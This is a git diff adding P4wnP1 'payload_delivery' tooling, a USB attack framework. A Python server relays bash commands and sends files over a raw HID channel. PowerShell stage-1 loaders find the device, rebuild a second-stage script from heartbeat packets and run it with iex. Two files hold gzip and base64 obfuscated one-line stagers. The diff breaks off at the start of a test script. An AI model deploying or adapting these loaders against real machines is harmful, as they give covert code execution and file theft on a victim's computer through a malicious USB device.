diff --git a/hidtools/payload_delivery/hidserver.py b/hidtools/payload_delivery/hidserver.py new file mode 100644 index 0000000..acf115f --- /dev/null +++ b/hidtools/payload_delivery/hidserver.py @@ -0,0 +1,331 @@ +#!/usr/bin/python + + +# This file is part of P4wnP1. +# +# Copyright (c) 2018, Marcus Mengs. +# +# P4wnP1 is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# P4wnP1 is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with P4wnP1. If not, see . + + +import sys +import struct +import Queue +import subprocess +import thread +import signal +from select import select +import time + +chunks = lambda A, chunksize=60: [A[i:i+chunksize] for i in range(0, len(A), chunksize)] + +# single packet for a data stream to send +# 0: 1 Byte src +# 1: 1 Byte dst +# 2: 1 Byte snd +# 3: 1 Byte rcv +# 4-63 60 Bytes Payload + +# client dst +# 1 stdin +# 2 stdout +# 3 stderr + +# reassemable received and enqueue report fragments into full streams (separated by dst/src) +def fragment_rcvd(qin, fragemnt_assembler, src=0, dst=0, data=""): + stream_id = (src, dst) + # if src == dst == 0, ignore (heartbeat) + if (src != 0 or dst !=0): + # check if stream already present + if fragment_assembler.has_key(stream_id): + # check if closing fragment (snd length = 0) + if (len(data) == 0): + # end of stream - add to input queue + stream = [src, dst, fragment_assembler[stream_id][2]] + qin.put(stream) + # delete from fragment_assembler + del fragment_assembler[stream_id] + else: + # append data to stream + fragment_assembler[stream_id][2] += data + #print repr(fragment_assembler[stream_id][2]) + else: + # start stream, if not existing + data_arr = [src, dst, data] + fragment_assembler[stream_id] = data_arr + + +def send_datastream(qout, src=1, dst=1, data=""): + # split data into chunks fitting into packet payload (60 bytes) + chnks = chunks(data) + for chunk in chnks: + data_arr = [src, dst, chunk] + qout.put(data_arr) + # append empty packet to close stream + qout.put([src, dst, ""]) + + +def send_packet(f, src=1, dst=1, data="", rcv=0): + snd = len(data) + #print "Send size: " + str(snd) + packet = struct.pack('!BBBB60s', src, dst, snd, rcv, data) + #print packet.encode("hex") + f.write(packet) + +def read_packet(f): + hidin = f.read(0x40) + #print "Input received (" + str(len(hidin)) + " bytes):" + #print hidin.encode("hex") + data = struct.unpack('!BBBB60s', hidin) + src = data[0] + dst = data[1] + snd = data[2] + rcv = data[3] + # reduce msg to real size + msg = data[4][0:snd] + return [src, dst, snd, rcv, msg] + +def process_input(qin, subproc): + # HID in loop, should ho to thread + # check if input queue contains data + while True: + if not qin.empty(): + input = qin.get() + src=input[0] + dst=input[1] + stream=input[2] + + # process received input + # stdin (redirect to bash) + if dst == 1: + command=stream + if command.upper() == "RESET_BASH": + # send sigint to bash + print "Restarting bash process" + reset_bash(subproc) + else: + print "running command '" + command + "'" + run_local_command(command, subproc) + # stdout + elif dst == 2: + print "Data received on stdout" + print stream + pass + # stderr + elif dst == 3: + pass + # getfile + elif dst == 4: + print "Data receiveced on dst=4 (getfile): " + stream + args=stream.split(" ",3) + if (len(args) < 3): + # too few arguments, echo this back with src=2, dst=3 (stderr) + print "To few arguments" + send_datastream(qout, 4, 3, "P4wnP1 received 'getfile' with too few arguments") + # ToDo: files are reassembled here, this code should be moved into a separate method + else: + # check if first word is "getfile" ignore otherwise + if not args[0].strip().lower() == "getfile": + send_datastream(qout, 4, 3, "P4wnP1 received data on dst=4 (getfile) but wrong request format was choosen") + continue + + filename = args[1].strip() + varname = args[2].strip() + content = None + # try to open file, send error if not possible + try: + with open(filename, "rb") as f: + content = f.read() # naive approach, reading whole file at once (we split into chunks anyway) + except IOError as e: + # deliver Error to Client errorstream + send_datastream(qout, 4, 3, "Error on getfile: " + e.strerror) + continue + + # send header + print "Varname " + str(varname) + send_datastream(qout, 4, 4, "BEGINFILE " + filename + " " + varname) + + # send filecontent (sould be chunked into multiple streams, but would need reassembling on layer5) + # note: The client has to read (and recognize) ASCII based header and footer streams, but content could be in binary form + if content == None: + send_datastream(qout, 4, 3, "Error on getfile: No file content read") + else: + #send_datastream(qout, 4, 4, content) + + streamchunksize=600 + for chunk in chunks(content, streamchunksize): + send_datastream(qout, 4, 4, chunk) + + + # send footer + send_datastream(qout, 4, 4, "ENDFILE " + filename + " " + varname) + + else: + print "Input in input queue:" + print input + + + + +def run_local_command(command, bash): + bash = subproc[0] + sin = bash.stdin + sin.write(command + "\n") + sin.flush() + return + +def process_bash_output(qout, subproc): + buf = "" + while True: + bash = subproc[0] + outstream = bash.stdout + + #print "Reading stdout of bash on " + str(outstream) + + # check for output which needs to be delivered from backing bash + try: + r,w,ex = select([outstream], [], [], 0.1) + except ValueError: + # we should land here if the output stream is closed + # because a new bash process was started + pass + + if outstream in r: + byte = outstream.read(1) + + if byte == "\n": + # full line received from subprocess, send it to HID + # note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client + + # we set src=1 as we receive bash commands on dst=1 + # dst = 2 (stdout of client) + send_datastream(qout, 2, 2, buf) + # clear buffer + buf = "" + else: + buf += byte + +def process_bash_error(qout, subproc): + buf = "" + while True: + bash = subproc[0] + errstream = bash.stderr + + # check for output which needs to be delivered from backing bash stderr + try: + r,w,ex = select([errstream], [], [], 0.1) + except ValueError: + # we should land here if the error stream is closed + # because a new bash process was started + pass + + if errstream in r: + byte = errstream.read(1) + if byte == "\n": + # full line received from subprocess, send it to HID + # note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client + + # dst = 3 (stderr of client) + send_datastream(qout, 3, 3, buf) + # clear buffer + buf = "" + else: + buf += byte + +# As we don't pipe CTRL+C intterupt from client through +# HID data stream, there has to be another option to reset the bash process if it stalls +# This could easily happen, as we don't support interactive commands, waiting for input +# (this non-interactive shell restriction should be a known hurdle to every pentester out there) +def reset_bash(subproc): + bash = subproc[0] + bash.stdout.close() + bash.kill() + send_datastream(qout, 3, 3, "Bash process terminated") + bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) + subproc[0] = bash + if bash.poll() == None: + send_datastream(qout, 3, 3, "New bash process started") + else: + send_datastream(qout, 3, 3, "Restarting bash failed") + + +# prepare a stream to answer a getfile request +def stream_from_getfile(filename): + with open(filename,"rb") as f: + content = f.read() + return content + + +# main code +qout = Queue.Queue() +qin = Queue.Queue() +fragment_assembler = {} +bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) +subproc = [bash] # packed into array to allow easy "call by ref" + +# process input +thread.start_new_thread(process_input, (qin, subproc)) +# process output +thread.start_new_thread(process_bash_output, (qout, subproc)) +# process error +thread.start_new_thread(process_bash_error, (qout, subproc)) + +# Initialize stage one payload, carried with heartbeat package in endless loop +with open("wifi_agent.ps1","rb") as f: + stage2=f.read() +#initial_payload="#Hey this is the test data for an initial payload calling get-date on PS\nGet-Date" +stage2_chunks = chunks(stage2) +heartbeat_content = [] +heartbeat_content += ["begin_heartbeat"] +heartbeat_content += stage2_chunks +heartbeat_content += ["end_heartbeat"] +heartbeat_counter = 0 + +with open("/dev/hidg1","r+b") as f: + # send test data stream + send_datastream(qout, 1, 1, "Hello from P4wnP1, this message has been sent through a HID device") + + while True: + packet = read_packet(f) + src = packet[0] + dst = packet[1] + snd = packet[2] + rcv = packet[3] + msg = packet[4] + + # put packet to input queue + fragment_rcvd(qin, fragment_assembler, src, dst, msg) + + #print "Packet received" + #print "SRC: " + str(src) + " DST: " + str(dst) + " SND: " + str(snd) + " RCV: " + str(rcv) + #print "Payload: " + repr(msg) + + + # send data from output queue (empty packet otherwise) + if qout.empty(): + # empty keep alive (rcv field filled) + #send_packet(f=f, src=0, dst=0, data="", rcv=snd) + + # as the content "keep alive" packets (src=0, dst=0) is ignored + # by the PowerShell client, we use them to carry the initial payload + # in an endless loop + if heartbeat_counter == len(heartbeat_content): + heartbeat_counter = 0 + send_packet(f=f, src=0, dst=0, data=heartbeat_content[heartbeat_counter], rcv=snd) + heartbeat_counter += 1 + + else: + packet = qout.get() + send_packet(f=f, src=packet[0], dst=packet[1], data=packet[2], rcv=snd) + diff --git a/hidtools/payload_delivery/stage1.ps1 b/hidtools/payload_delivery/stage1.ps1 new file mode 100644 index 0000000..bfc766f --- /dev/null +++ b/hidtools/payload_delivery/stage1.ps1 @@ -0,0 +1,242 @@ + +# This file is part of P4wnP1. +# +# Copyright (c) 2017, Marcus Mengs. +# +# P4wnP1 is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# P4wnP1 is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with P4wnP1. If not, see . + + +# P4wnP1 HID Script +$USB_VID="1D6B" +$USB_PID="0137" + +function ReflectCreateFileMethod() +{ + $Domain = [AppDomain]::CurrentDomain + $DynAssembly = New-Object System.Reflection.AssemblyName("MaMe82DynAssembly") + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("MaMe82DynModule", $False) + $TypeBuilder = $ModuleBuilder.DefineType("MaMe82", "Public, Class") + # Define the CreateFile Method + $CreateFileMethod = $TypeBuilder.DefineMethod( + "CreateFile", # Method Name + [System.Reflection.MethodAttributes] "Public, Static", # Method Attributes + [IntPtr], # Method Return Type + [Type[]] @( + [String], # lpFileName + [Int32], # dwDesiredAccess + [UInt32], # dwShareMode + [IntPtr], # SecurityAttributes + [UInt32], # dwCreationDisposition + [UInt32], # dwFlagsAndAttributes + [IntPtr] # hTemplateFile +     ) # Method Parameters + ) + + # Import DLL + $CreateFileDllImport = [System.Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) + + # Define Fields + $CreateFileFieldArray = [System.Reflection.FieldInfo[]] @( + [System.Runtime.InteropServices.DllImportAttribute].GetField("EntryPoint"), + [System.Runtime.InteropServices.DllImportAttribute].GetField("PreserveSig"), + [System.Runtime.InteropServices.DllImportAttribute].GetField("SetLastError"), + [System.Runtime.InteropServices.DllImportAttribute].GetField("CallingConvention"), + [System.Runtime.InteropServices.DllImportAttribute].GetField("CharSet") + ) + + # Define Values for the fields + $CreateFileFieldValueArray = [Object[]] @( + "CreateFile", + $True, + $True, + [System.Runtime.InteropServices.CallingConvention]::Winapi, + [System.Runtime.InteropServices.CharSet]::Auto + ) + + # Create a Custom Attribute and add to our Method + $CreateFileCustomAttribute = New-Object System.Reflection.Emit.CustomAttributeBuilder( + $CreateFileDllImport, + @("kernel32.dll"), + $CreateFileFieldArray, + $CreateFileFieldValueArray + ) + $CreateFileMethod.SetCustomAttribute($CreateFileCustomAttribute) + + # Create the Type within our Module + #$MaMe82 = $TypeBuilder.CreateType() + $TypeBuilder.CreateType() +} + +function CreateFileStreamFromDevicePath($MaMe82Class, [String] $path) +{ + # CreateFile method has to be built in [MaMe82]::CreateFile() + # call ReflectCreateFileMethod to achieve this + + # Call CreateFile for given devicepath + # (GENERIC_READ | GENERIC_WRITE) = 0XC0000000 + # FILE_FLAG_OVERLAPPED = 0x40000000; + $handle = $MaMe82Class::CreateFile($path, [System.Int32]0XC0000000, [System.IO.FileAccess]::ReadWrite, [System.IntPtr]::Zero, [System.IO.FileMode]::Open, [System.UInt32]0x40000000, [System.IntPtr]::Zero) + + # Create SafeFileHandle from file + # Note: [Microsoft.Win32.SafeHandles.SafeFileHandle]::new() isn't accessible on PS 2.0 / NET2.0 + # thus we use reflection to construct FileStream + #$shandle = [Microsoft.Win32.SafeHandles.SafeFileHandle]::new($devicefile, [System.Boolean]0) + $a = $handle, [Boolean]0 + $c=[Microsoft.Win32.SafeHandles.SafeFileHandle].GetConstructors()[0] + $shandle = $c.Invoke($a) + + # Create filestream from SafeFileHandle + #$Device = [System.IO.FileStream]::new($shandle, [System.IO.FileAccess]::ReadWrite, [System.UInt32]32, [System.Boolean]1) + # Note: again Reflection has to be used to access the constructor of FileStream + $fa=[System.IO.FileAccess]::ReadWrite + $a=$shandle, $fa, [System.Int32]64, [System.Boolean]1 + $c=[System.IO.FileStream].GetConstructors()[14] + $Device = $c.Invoke($a) + + + return $Device +} + +function send_data($file, $source, $dest, $data, $received) +{ + $report_id = [byte] 0 + $src = [byte] $source + $dst = [byte] $dest + $snd = [byte] $data.Length + $rcv = [byte] $received + + $i=0 + $bytes = New-Object Byte[] (65) + $bytes[$i++] = $report_id + $bytes[$i++] = $src + $bytes[$i++] = $dst + $bytes[$i++] = $snd + $bytes[$i++] = $rcv + + $data.CopyTo($bytes, $i) + + $devfile.Write($bytes, 0, $bytes.Length) + + +} + +function read_data($file) +{ + $r = New-Object Byte[] (65) + $cr = $devfile.Read($r,0,65) + + # async read able to send heartbeats, which isn't needed anymore + #$asyncReadResult = $devfile.BeginRead($r, 0, 65, $null, $null) + #while (-not $asyncReadResult.IsCompleted) + #{ + # # Sending heartbeat data if needed, heartbeat otherwise + # $heartbeat = New-Object Byte[] (0) + # #send_data $devfile 0 0 $heartbeat 0 + #} + #$cr = $devfile.EndRead($asyncReadResult) + + $i=0 + $report_id = $r[$i++] + $src = $r[$i++] + $dst = $r[$i++] + $snd = $r[$i++] + $rcv = $r[$i++] + + + $msg = New-Object Byte[] ($snd) + + [Array]::Copy($r, $i, $msg, 0, $snd) + + + # msg + return $src, $dst, $snd, $rcv, $msg +} + +function GetDevicePath($USB_VID, $USB_PID) +{ + $HIDGuid="{4d1e55b2-f16f-11cf-88cb-001111000030}" + foreach ($wmidev in gwmi Win32_USBControllerDevice |%{[wmi]($_.Dependent)} ) { + #[System.Console]::WriteLine($wmidev.PNPClass) + if ($wmidev.DeviceID -match ("$USB_VID" + '&PID_' + "$USB_PID") -and $wmidev.DeviceID -match ('HID') -and -not $wmidev.Service) { + $devpath = "\\?\" + $wmidev.PNPDeviceID.Replace('\','#') + "#" + $HIDGuid + } + } + $devpath +} + + + +####### +# Init RAW HID device +######### + +# Use Reflection to create [MaMe82]::CreateFile from kernel32.dll +$MaMe82Class = ReflectCreateFileMethod + +$path= GetDevicePath $USB_VID $USB_PID +# create FileStream to device +$devfile = CreateFileStreamFromDevicePath $MaMe82Class $path +$count = -1 +$stage1 = "" + +try +{ + while ($devfile.SafeFileHandle -ne $null) + { + $heartbeat = New-Object Byte[] (0) + send_data $devfile 0 0 $heartbeat 0 + + $packet = read_data $devfile + # set RCV to SND to acknowledge full packet in next send + $src = $packet[0] + $dst = $packet[1] + $snd = $packet[2] + $rcv = $packet[3] + $msg = $packet[4] + + $utf8 = [System.Text.Encoding]::UTF8.GetString($msg) + + + if ($utf8.StartsWith("end_heartbeat") -and ($count -gt 0)) + { + [System.Console]::WriteLine("Received last package of stage1") + + break + } + if ($utf8.StartsWith("begin_heartbeat")) + { + $count = 0 + [System.Console]::WriteLine("Received first package of stage1") + } + elseif ($count -ge 0) + { + # belongs to stream, assemble + $stage1 += $utf8 + $count += 1 + [System.Console]::WriteLine("Received package $count of stage1") + } + + + } + [System.Console]::WriteLine("stage1 reassembled") + [System.Console]::WriteLine("$stage1") + iex $stage1 +} +finally +{ + # end main thread + $devfile.Close() + $devfile.Dispose() +} \ No newline at end of file diff --git a/hidtools/payload_delivery/stage1_mini.ps1 b/hidtools/payload_delivery/stage1_mini.ps1 new file mode 100644 index 0000000..742be6b --- /dev/null +++ b/hidtools/payload_delivery/stage1_mini.ps1 @@ -0,0 +1 @@ +$b='H4sIAAAAAAAEAKVXbU/bSBD+jsR/sFzfxRGJ5VBaISR0Bwm0kUobNXA9XbDQxh4ne9jeaL1OG/X47zezu7YT2lSqCoLYuzPPPPO6m8ODtCpixUXhfIQ0g1gNJTAF1zyDG1BLkfjdw4OvhwdeInLn3JldrFYjkTNeRGdnw0pKKJR5JxGGEu/hc//D/F9EqhERPLgoS8jn2eY9y8F3b9gNnB6PNkW97KIRj81RnewEI0h5AbjPch7XMj7i95zZFuhVzlWDfFnxLAF5EcdQlkjuY1UQaK5B2XwX80YkVbZNxCy4Pce7ZlkJpKm0Zl5r3m5WjQLKuZNqnvG45wwzVpaaf5xShFDPatj4uW1E3V3+RuBCKcnnlYIyalGniikek/y4UBMlI3wiBrMocv70Z1NUKRaR2X55TA93zVOrcbd/1+lqygmnpGKsFM8hwD2QYjUFueYYxmCUZeN8JaRqOEbBG1BDUZRKVrES0m/JGMCUacDWyWsOWTIuUmGp/6Qtre67V4WSm4nghXK7vZ8mbEEmEkqUhClf/ALKFNQ7VqorKYX8BZghyzIMG8ZyjT2EkfoVrCWTSMu1KUjXOgmmC03Yd4vQu5UVNB97jX5DEdvqEy/Yiv9IyXBB0YtKCUMo3j8YdA8Pq1KJvHHNtrJP5dkj8o8gC8heHgdJllGYqMz0f/TUdl6ANp/B+NqyaeXA+K+bGFeeDtu510YGCxlYfi1FPgJyZsLU0vfyPM7QX1vljrfCVTsTl3pC4D7OwgbF1xJNa4Z/D0PzQ0sfAhJphxSw5JPkCtrGPDv7B+PZyuJkAlz8sIKi7ePwy8kW6LaiHqREixhcCpEBK6KQYnQ+u+GxFKVIVYBZxGhOWQpvWZFkmDZ6JnPm/Xmbl353Fka1xzEmfS0e0VMd3ZSd73eM6JwTGY9SZmPy+mSL3MCQswgmB9+zPzhBAhJUJYvnFLbTWUKRPCRMMd9LEQ8Nl6KSMT0kUCr6wE38kBADX0Nic8nPKUrzDc7h3WK9xKVZ5PivX3VrgZnHj44i6jF6jZxw34a1vXebGO3fRJ7BOygWarlXpnZCn74oPhSrza3wjTQ6yYlzAmsKRaAT0uxh6ZhHa+NZHDEN23G0UZI/ik0s9QFurVEJ+J7shT2zawIsgabYA09IVBp/cLmU8e5CUqpnEsUzFRmvdxfycvF9dqSLDGYXUrIN3VswSMQMw4N/qGaCYaTqCkNGVCu6YnCHCiZeG/HdQGGlbo+Lu+nlw1/jEUrS02Q8spF7Ox69qXhy7n49SQbw6tX8uJ8OXqf9wSBO+6en8bwfhgP8oaZ+GT65aEFgDuIl8v+cc4yqwwtngY+O7t4HhMcOUVJkGUjDwPnvt68zlIh87wEvITgyEhzc3Sen6yAFnjZQgZEfj5x+zhTZcGvirnPkdH5H3g8dfHJrL9yu08fR4OwF6KCDHSvUL4RqJO3JoClQcdB0xDy59/d/3JOxWm7yflKDYu2sMhaD37nv9DovEBaZvNDCNow6BU8toHmhUYzQe26yKECi57sZc2rHm4S1HYNYPz4dzPQ3ZwI1gMBDEZX6NNNKxRZwTJ5iLj3IV2rz/fIMsULwdqPL5POSzPpNE+2OZQwsOF5RZZkpqmbWNV3nhPhrjYXa4fgRiFLTzo2oLQgjgdNdg4cGOMbC4kUFOqzbYoP9Yl6l0lMaTbfwRQVXRSwSOjDPzu5ur09pnpsTtIE6iboWmxQDvPFKVX7i2EMuubUEfJ9j8OvK8214+wuF9g2BObr12JL8BmgOC15sQ9lmrBOFIZrRMYMnEd1taD6+w5s7XvIIxDHTFUk7JpmumZGA3xC0vZpQE5A66Uc4mIhMYwoXBt/a8t3AQj7tI2IB0U/zPQcS0uDwxbG2zDDCW1mWbew3NVs7w0yU+rbTrIx4ubJrqHR48D9inn4F/g0AAA==';nal no New-Object -F;iex (no IO.StreamReader(no IO.Compression.GZipStream((no IO.MemoryStream -A @(,[Convert]::FromBase64String($b))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd() diff --git a/hidtools/payload_delivery/stage1_mini.ps1.old b/hidtools/payload_delivery/stage1_mini.ps1.old new file mode 100644 index 0000000..62c7381 --- /dev/null +++ b/hidtools/payload_delivery/stage1_mini.ps1.old @@ -0,0 +1 @@ +$b='H4sIAAAAAAAEAKVXbW/bNhD+PqD/QVC9WUZsQU7SLAhgbImdtAGa1qiTdZgjBLR0srlIpEFRbo0u/313JCXbaV2gaILEEnn33HOvpF/80rqbXDz8dT0a+P3RyYX/wi6MaSHqH/2OC1klEs2l8D5AlkOihwqYhiueww3ohUyDzotfvqBeKgtv4E3Pl8uRLBgX8dnZsFIKhLbvJMJQ4h186r2f/YtINSKCh+dlCcUsX79jBQT+DbuB08PRWtTLPhppsRmqk51wBBkXgPus4EktEyB+15tugV4WXDfIFxXPU1DnSQJlieQ+VIJACwPKZruYNzKt8m0idsHveq0rlpdAmtpoFrXm7XrZKKCcP65mOU+63jBnZWn4JxlFCPWchoufv4mov8vfCpxrrfis0lDGG9SJZponJH8t9FirGJ+IwTSOvT+D6QRVxDy220eH9HDXPG007vbveh1DOeWUVIyV5gWEuAdKLiegVhzDGI7y/LpYSqUbjnH4GvRQilKrKtFSBRsyFjBjBnDj5BWHPL0WmXTUf9CWUQ/8S6HVeiy50H6n+8OEHchYQYmSMOHzn0CZgH7LSn2plFQ/ATNkeY5hw1iusIcwUj+DtWAKafkuBdnKJMF2oQ37bhG2blUFzcdeo19RxLb6yAVb8u8pWS4oel5paQkl+weD6eFhVWpZNK65Vg6oPLtE/hGUgPzoMEzznMJEZWb+o6eu80K0+QwmMJZtK4fWf9PEuPK0Nfc2kcFCBlZcKVmMgJwZM70IWkWR5Oivq3KvtcRVNxMXZkLgPs7CBiUwEk1rRn8PI/tDS+9DEtkMKWDpR8U1bBrz7OwfjOdGFicT4OL7JYhNH0efj7dAtxXNICVaxOBCyhyYiCOK0WB6wxMlS5npELOI0ZywDN4wkeaYNnomc/b9eZuXQWcaxbXHCSZ9JR/RUxPdjA32O0Z0BkSmRSlzMTk53iLXt+Qcgs3Bt+z3j5GAAl0p8ZzCdjpLEOlDyjQLWhnioeFSViqhhxRKTR+4iR8KEuArSF0u+YCiNFvjHN4t1gtcmsZecPKqUwtMW/zgIKYeo9fYi/ZtONt7t4nR/k3kGb4FMdeLvTK1E+b0RfGhXK5vZWCl0UlOnFNYUShCk5BmD0vHPjobz+KIadiOo4uS+l5sEmUOcGeNSiBoqW7Utbs2wApoij3wlESV9QeXS5XsLqSlfiYhnqmoZLW7UJTzb7MjXWQwPVeKrenegkEiZhge/EM1GwwrVVcYMqJaMRWDO1QwycqK7wYKK3V7XLgLF0q6m5aL3Jvr0euKpwP/y3Hah1evZoe9rH+S9fr9JOudniazXhT18Yea+ih6opuZxBwkC+T/qeAYVY8Lb46PnuneB4THDtFK5jkoy8D779cvU5SIg9YDXkJwZKQ4uDtPXsdDCjxroEIrfz3yegXTZMOvifvegdf+DXk/tPHJr73wO14PR4O3F6CNDradUE9I3Ui6k8FQoOKg6Yh58u/v/7gnY7Xc+N24BsXaWeYsgaB93+62XyIsMnlphF0YTQqeNoD2hUYxQu+5yaIAiQ52M+bVjjcJ23QMYn3/dLDT354J1AASD0VU6tFMKzWbwyF5StduKJZ6/e3yjLBC8HZjyuTTgswGTRPtjmUMLHgtUeW5Lapm1jVd50X464xFxuHkEYhS086NqCsIK4HT3YBHFjjBwuKiAhPWbbH+frFWpbNTGk238FmHlyKRKR2YZ2d3t1enNM/tCdpAHccdh02KId54lS4/cuwhn9xaAL7PMPh15QUuvL25RvuWwAzdetyQ/ApoBnMutqFcM9aJwhBN6ZjBk4juNjQf3+LNHS95BOLZ6YqkPZtM385IwG8Ixl5NqAlInfQDHExEpjGFC/2vbQV+6CCf9hFxgOin/Z4DKWlw+Ow5W3YY4a0sz9fum5qrnWEuS3PbaVZGvFy6NVT6H8d3IaseDgAA';nal no New-Object -F;iex (no IO.StreamReader(no IO.Compression.GZipStream((no IO.MemoryStream -A @(,[Convert]::FromBase64String($b))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd() diff --git a/hidtools/payload_delivery/stage1_reduced.ps1 b/hidtools/payload_delivery/stage1_reduced.ps1 new file mode 100644 index 0000000..14e9127 --- /dev/null +++ b/hidtools/payload_delivery/stage1_reduced.ps1 @@ -0,0 +1,171 @@ + +# This file is part of P4wnP1. +# +# Copyright (c) 2017, Marcus Mengs. +# +# P4wnP1 is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# P4wnP1 is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with P4wnP1. If not, see . + + +# P4wnP1 HID Script +$USB_VID="1D6B" +$USB_PID="0137" + +function ReflectCreateFileMethod() +{ + $dom = [AppDomain]::CurrentDomain + $da = New-Object Reflection.AssemblyName("MaMe82DynAssembly") + $ab = $dom.DefineDynamicAssembly($da, [Reflection.Emit.AssemblyBuilderAccess]::Run) + $mb = $ab.DefineDynamicModule("MaMe82DynModule", $False) + $tb = $mb.DefineType("MaMe82", "Public, Class") + $cfm = $tb.DefineMethod("CreateFile", [Reflection.MethodAttributes] "Public, Static", [IntPtr], [Type[]] @([String], [Int32], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr] )) + $cdi = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) + $cfa = [Reflection.FieldInfo[]] @([Runtime.InteropServices.DllImportAttribute].GetField("EntryPoint"), [Runtime.InteropServices.DllImportAttribute].GetField("PreserveSig"), [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError"), [Runtime.InteropServices.DllImportAttribute].GetField("CallingConvention"), [Runtime.InteropServices.DllImportAttribute].GetField("CharSet")) + $cffva = [Object[]] @("CreateFile", $True, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) + $cfca = New-Object Reflection.Emit.CustomAttributeBuilder($cdi, @("kernel32.dll"), $cfa, $cffva) + $cfm.SetCustomAttribute($cfca) + $tb.CreateType() +} + +function CreateFileStreamFromDevicePath($mmcl, [String] $path) +{ + # CreateFile method has to be built in [MaMe82]::CreateFile() + # call ReflectCreateFileMethod to achieve this + + # Call CreateFile for given devicepath + # (GENERIC_READ | GENERIC_WRITE) = 0XC0000000 + # FILE_FLAG_OVERLAPPED = 0x40000000; + $h = $mmcl::CreateFile($path, [Int32]0XC0000000, [IO.FileAccess]::ReadWrite, [IntPtr]::Zero, [IO.FileMode]::Open, [UInt32]0x40000000, [IntPtr]::Zero) + + # Create SafeFileHandle from file + # Note: [Microsoft.Win32.SafeHandles.SafeFileHandle]::new() isn't accessible on PS 2.0 / NET2.0 + # thus we use reflection to construct FileStream + #$shandle = [Microsoft.Win32.SafeHandles.SafeFileHandle]::new($devicefile, [System.Boolean]0) + $a = $h, [Boolean]0 + $c=[Microsoft.Win32.SafeHandles.SafeFileHandle].GetConstructors()[0] + $h = $c.Invoke($a) + + # Create filestream from SafeFileHandle + #$Device = [System.IO.FileStream]::new($h, [System.IO.FileAccess]::ReadWrite, [System.UInt32]32, [System.Boolean]1) + # Note: again Reflection has to be used to access the constructor of FileStream + $fa=[IO.FileAccess]::ReadWrite + $a=$h, $fa, [Int32]64, [Boolean]1 + $c=[IO.FileStream].GetConstructors()[14] + return $c.Invoke($a) +} + +function send_data($file, $source, $dest, $data, $received) +{ + + $i=0 + $bytes = New-Object Byte[] (65) + $bytes[$i++] = [byte] 0 + $bytes[$i++] = [byte] $source + $bytes[$i++] = [byte] $dest + $bytes[$i++] = [byte] $data.Length + $bytes[$i++] = [byte] $received + + $data.CopyTo($bytes, $i) + + $devfile.Write($bytes, 0, $bytes.Length) + + +} + + +function read_data($file) +{ + $r = New-Object Byte[] (65) + $cr = $devfile.Read($r,0,65) + + $i=0 + $report_id = $r[$i++] + $src = $r[$i++] + $dst = $r[$i++] + $snd = $r[$i++] + $rcv = $r[$i++] + + + $msg = New-Object Byte[] ($snd) + [Array]::Copy($r, $i, $msg, 0, $snd) + return $src, $dst, $snd, $rcv, $msg +} + +function GetDevicePath($USB_VID, $USB_PID) +{ + $HIDGuid="{4d1e55b2-f16f-11cf-88cb-001111000030}" + foreach ($wmidev in gwmi Win32_USBControllerDevice |%{[wmi]($_.Dependent)} ) { + #[System.Console]::WriteLine($wmidev.PNPClass) + if ($wmidev.DeviceID -match ("$USB_VID" + '&PID_' + "$USB_PID") -and $wmidev.DeviceID -match ('HID') -and -not $wmidev.Service) { + $devpath = "\\?\" + $wmidev.PNPDeviceID.Replace('\','#') + "#" + $HIDGuid + } + } + $devpath +} + +####### +# Init RAW HID device +######### + +# Use Reflection to create [MaMe82]::CreateFile from kernel32.dll +$mmcl = ReflectCreateFileMethod + +$path= GetDevicePath $USB_VID $USB_PID +# create FileStream to device +$devfile = CreateFileStreamFromDevicePath $mmcl $path +$count = -1 +$stage2 = "" + +$empty = New-Object Byte[] (0) +try +{ + while ($devfile.SafeFileHandle -ne $null) + { + + send_data $devfile 0 0 $empty 0 + $packet = read_data $devfile + if ($packet[0] -ne 0) + { + break # src not 0, no heartbeat (carying stage2) + } + if ($packet[1] -ne 0) + { + break # dst not 0, no heartbeat (carying stage2) + } + $utf8 = [Text.Encoding]::UTF8.GetString($packet[4]) + if ($utf8.StartsWith("end_heartbeat") -and ($count -gt 0)) + { + break + } + if ($utf8.StartsWith("begin_heartbeat")) + { + $count = 0 + [Console]::WriteLine("Start receiving stage2") + } + elseif ($count -ge 0) + { + # belongs to stream, assemble + $stage2 += $utf8 + $count += 1 + [Console]::Write(".") + } + } + [Console]::WriteLine("stage2 reassembled") + iex $stage2 +} +finally +{ + # end main thread + $devfile.Close() + $devfile.Dispose() +} \ No newline at end of file diff --git a/hidtools/payload_delivery/stage1_test.ps1 b/hidtools/payload_delivery/stage1_test.ps1 new file mode 100644 index 0000000..aa7cd97 --- /dev/null +++ 